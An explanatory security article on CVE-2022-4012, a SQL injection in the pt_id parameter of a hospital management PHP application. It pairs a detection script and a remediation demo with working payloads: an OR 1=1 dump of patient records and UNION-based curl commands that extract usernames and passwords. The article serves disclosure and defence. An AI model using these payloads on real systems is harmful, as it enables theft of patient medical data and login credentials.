Most vulnerabilities disclosed day to day are routine, but some stand out for how simple they are to exploit and how sensitive the data behind them is. CVE-2022-4012 is one of those. This article gives a plain-English breakdown of the SQL injection bug, how it works, how it is exploited, and what you need to do to stay protected, with technical examples and links to the original advisories.

What is CVE-2022-4012?

CVE-2022-4012 is a SQL injection vulnerability in Hospital Management Center, a PHP web application for hospitals; VulDB classifies it as critical. The flaw sits in an unspecified function of the file patient-info.php (the public advisory does not name the function). The page reads a query-string parameter called pt_id and passes it to the database without neutralising it, so an attacker who manipulates that value can inject SQL into the query the application runs against its backend database.

The advisory states the attack can be launched remotely and that a public exploit has been disclosed; it does not spell out whether a logged-in session is required, so treat any reachable instance as exposed. This is bad news for any hospital or clinic running a vulnerable version of this software.

References

- VulDB: VDB-213786
- CVE Details: CVE-2022-4012
- NVD (National Vulnerability Database): CVE-2022-4012

Understanding the Exploit

Let’s break it down with a practical example. In hospital software, there’s often a page that shows details for a specific patient. This is usually achieved with a URL like:

http://example.com/patient-info.php?pt_id=123

The pt_id value is the patient's ID in the database. The vulnerable code behind the scenes _might_ look like this (the advisory does not publish the real source; this is a simplified PHP reconstruction):

<?php
// A dangerous way to handle user input - DO NOT COPY
$pt_id = $_GET['pt_id'];                               // raw, attacker-controlled string
$query = "SELECT * FROM patients WHERE id = $pt_id";   // interpolation: the value becomes SQL text, not data
$result = mysqli_query($conn, $query);                 // $conn is an existing mysqli connection
?>


Notice there is no input validation, no escaping and no parameterised query: whatever the client sends in the pt_id parameter is spliced into the SQL statement as SQL, not as a value.

Exploiting CVE-2022-4012

Because the value of pt_id is simply dropped into the SQL query with no checks, an attacker can submit crafted input to manipulate the query. For example:

http://example.com/patient-info.php?pt_id=1 OR 1=1

This transforms the query into

SELECT * FROM patients WHERE id = 1 OR 1=1;


The OR 1=1 condition always evaluates to true, potentially returning all patient data from the database—a massive privacy violation.

Going further, an attacker can use a UNION query to read other tables (application user accounts, for example) or to fingerprint the database:

http://example.com/patient-info.php?pt_id=1 UNION SELECT user(), database(), version() --

A UNION only works when the injected SELECT returns the same number of columns as the original query, so this payload assumes patients has exactly three columns; in practice the attacker first finds the count (with ORDER BY n, or by padding with NULL) and then chooses what to read. Because mysqli_query() runs a single statement, a second DELETE or UPDATE cannot simply be appended; the larger risk is wholesale data theft and reuse of stolen credentials to log in legitimately afterwards.

Here is a basic exploit using curl (on Linux, macOS or Windows with curl installed). The payload is URL-encoded so the shell passes it through unchanged:

curl "http://example.com/patient-info.php?pt_id=1%20OR%201=1"

Or a UNION-based attack that pulls application credentials. The table name users and its username and password columns are assumptions for illustration; the real schema has to be enumerated first, for example through information_schema:

curl "http://example.com/patient-info.php?pt_id=-1%20UNION%20SELECT%201,username,password%20FROM%20users%20--%20"

The leading -1 makes the original WHERE clause match nothing, so the page renders only the UNIONed row. The trailing %20 after -- is not optional: MySQL only treats -- as a comment when it is followed by whitespace.

These commands exploit the SQL injection to dump or list data from sensitive database tables.
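On the detection side, here is an added example that is not part of the original article or of the Hospital Management Center project: a Python script that parses web-server access-log lines in combined log format and flags any request to patient-info.php whose pt_id is not a plain integer, which is the one thing a legitimate request never deviates from. The log lines are constructed for the example (addresses, timestamps and user agents are made up), and the SQL-marker regex is the editor's own heuristic rather than a vendor signature.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in combined log format; hosts, times and agents are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Nov/2022:10:01:02 +0000] "GET /patient-info.php?pt_id=123 HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Nov/2022:10:01:09 +0000] "GET /patient-info.php?pt_id=1%20OR%201=1 HTTP/1.1" 200 98211 "-" "curl/7.81.0"
198.51.100.7 - - [16/Nov/2022:10:02:15 +0000] "GET /patient-info.php?pt_id=-1%20UNION%20SELECT%201,username,password%20FROM%20users%20--%20 HTTP/1.1" 200 1502 "-" "curl/7.81.0"
198.51.100.7 - - [16/Nov/2022:10:02:20 +0000] "GET /patient-info.php?pt_id=1' HTTP/1.1" 500 0 "-" "sqlmap/1.6.11"
203.0.113.9 - - [16/Nov/2022:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# One combined-format line: client, identd, user, [timestamp], "METHOD target PROTO", status, bytes, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Heuristic markers for SQL syntax in a field that should only ever hold digits (editor's own rule).
SQLI_MARKERS = re.compile(r"(?i)\bunion\b|\bselect\b|\bor\b\s+\S+=\S+|--|/\*|['\";#]")

TARGET_PATH = "/patient-info.php"


def parse_line(line):
    """Parse one log line into a dict, decoding the query string; None if the line is malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qs splits on & and = before percent-decoding, so 1%20OR%201=1 survives as one value
    rec["params"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def classify_pt_id(value):
    """Return None for a well-formed id, otherwise a short verdict string."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    if SQLI_MARKERS.search(value):
        return "sqli-pattern"
    return "non-numeric"


def scan(log_text):
    """Return one finding per suspicious pt_id seen on requests to patient-info.php."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != TARGET_PATH:
            continue
        for value in rec["params"].get("pt_id", []):
            verdict = classify_pt_id(value)
            if verdict:
                findings.append({
                    "ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                    "agent": rec["agent"], "pt_id": value, "verdict": verdict,
                })
    return findings


def by_source(findings):
    """Count findings per client address, the first thing an analyst pivots on."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]:14s} {h["status"]} {h["verdict"]:12s} pt_id={h["pt_id"]!r} ({h["agent"]})')
    print("per source:", by_source(hits))
```

The allow-list check (digits only) does the real work; the SQL-marker regex only labels why a value failed, which keeps the rule robust against encodings and keywords it has never seen. A 200 with an unusually large response body next to an OR 1=1 payload, as in the second sample line, is the signal that the dump succeeded rather than merely being attempted.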

Why It’s Serious

Medical data is some of the most sensitive information there is: patients' full names, medical histories, insurance policies and contact details. An attacker exploiting this flaw could:

- dump the entire patients table with a single crafted request (the OR 1=1 case above)
- read other tables through UNION queries, including application user accounts and password hashes
- escalate to full control of the application, and possibly the host, if the database holds admin credentials that are reused elsewhere

Any of these can lead to blackmail, medical fraud, and severe reputational and financial damage to the hospital or clinic.

If you are a hospital IT manager or developer

1. Patch the software. Check for updates or patches from your vendor and, if a fix exists, apply it as soon as possible. If none exists yet, restrict network access to the application and consider a web application firewall rule that rejects non-numeric pt_id values as a stop-gap, not as the fix.

2. Use prepared statements. Never build SQL by string interpolation. In PHP, use mysqli_prepare() with bind_param(), or PDO with bound parameters, so that pt_id reaches the database as a value rather than as part of the query text.

3. Validate input. pt_id is a numeric identifier, so reject anything that is not a short string of digits before it reaches the database layer, and log the rejections; validation is defence in depth alongside, not instead of, parameterised queries.
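To tie the exploit section and these three steps together, here is an added example that is not code from the article or from Hospital Management Center. It reproduces the boolean and UNION injections from the exploit section against an in-memory SQLite database, then shows the parameterised lookup and the digits-only validation the remediation steps call for. The schema (a patients table and a users table with the columns shown) is invented for the demonstration, and SQLite is used only because it accepts the same payloads MySQL does while running offline.

```python
import re
import sqlite3

# Constructed schema and rows standing in for the hospital database; names are assumptions.
SCHEMA = """
CREATE TABLE patients (id INTEGER PRIMARY KEY, name TEXT, diagnosis TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO patients VALUES (1, 'Alice Example', 'influenza'),
                            (2, 'Bob Example', 'fracture'),
                            (3, 'Carol Example', 'asthma');
-- constructed MD5 hash for illustration only
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def make_db():
    """Return a fresh in-memory SQLite connection loaded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, pt_id):
    """Mirror of the page's PHP: the untrusted value is spliced into the SQL text."""
    query = f"SELECT id, name, diagnosis FROM patients WHERE id = {pt_id}"
    return conn.execute(query).fetchall()


def parameterised_lookup(conn, pt_id):
    """Parameter binding only: whatever pt_id contains is sent to the engine as a literal value."""
    query = "SELECT id, name, diagnosis FROM patients WHERE id = ?"
    return conn.execute(query, (pt_id,)).fetchall()


def validate_pt_id(raw):
    """Allow-list check: a patient id is a short run of digits and nothing else."""
    if not isinstance(raw, str) or not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError(f"rejected pt_id: {raw!r}")
    return int(raw)


def safe_lookup(conn, raw_pt_id):
    """What patient-info.php should do: validate first, then bind."""
    return parameterised_lookup(conn, validate_pt_id(raw_pt_id))


# The two payloads from the exploit section, as the application would receive them after URL decoding.
BOOLEAN_PAYLOAD = "1 OR 1=1"
UNION_PAYLOAD = "-1 UNION SELECT 1, username, password FROM users -- "


def demo():
    """Run each lookup style against a normal id and both payloads; return the outcomes by label."""
    conn = make_db()
    results = {
        "vuln_normal": vulnerable_lookup(conn, "2"),
        "vuln_boolean": vulnerable_lookup(conn, BOOLEAN_PAYLOAD),   # every patient row
        "vuln_union": vulnerable_lookup(conn, UNION_PAYLOAD),       # the admin credential row
        "param_boolean": parameterised_lookup(conn, BOOLEAN_PAYLOAD),  # no row: payload is just a string
        "param_union": parameterised_lookup(conn, UNION_PAYLOAD),
        "safe_normal": safe_lookup(conn, "2"),
    }
    try:
        safe_lookup(conn, BOOLEAN_PAYLOAD)
        results["safe_boolean"] = "accepted"
    except ValueError as exc:
        results["safe_boolean"] = str(exc)   # rejected before any SQL runs
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:14s} -> {outcome}")
```

Two things are worth noticing when you run it. Parameter binding alone already defeats both payloads, because the engine compares the integer column against the whole string and nothing matches; validation adds a second, independent barrier and a clean place to log the attempt. The UNION payload only succeeds because the injected SELECT returns three columns, matching the original query, which is the column-count constraint described in the exploit section.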

Responsible Disclosure

This vulnerability has already been disclosed publicly. If you find unpatched systems, consider reporting them responsibly to minimize harm.


In Summary

CVE-2022-4012 is an easy-to-exploit SQL injection flaw in Hospital Management Center's patient-info.php, rated critical by VulDB, that puts sensitive patient data at serious risk. An attacker can read, and potentially tamper with, medical records just by changing a URL parameter. If you manage medical IT, or care about patient privacy, make sure the software is updated, pt_id and every other input is validated and bound as a parameter, and your staff know what the attack looks like in the logs.

Stay safe. Protect your patients. Patch now!




Timeline

Published on: 11/16/2022 08:15:00 UTC
Last modified on: 11/17/2022 14:58:00 UTC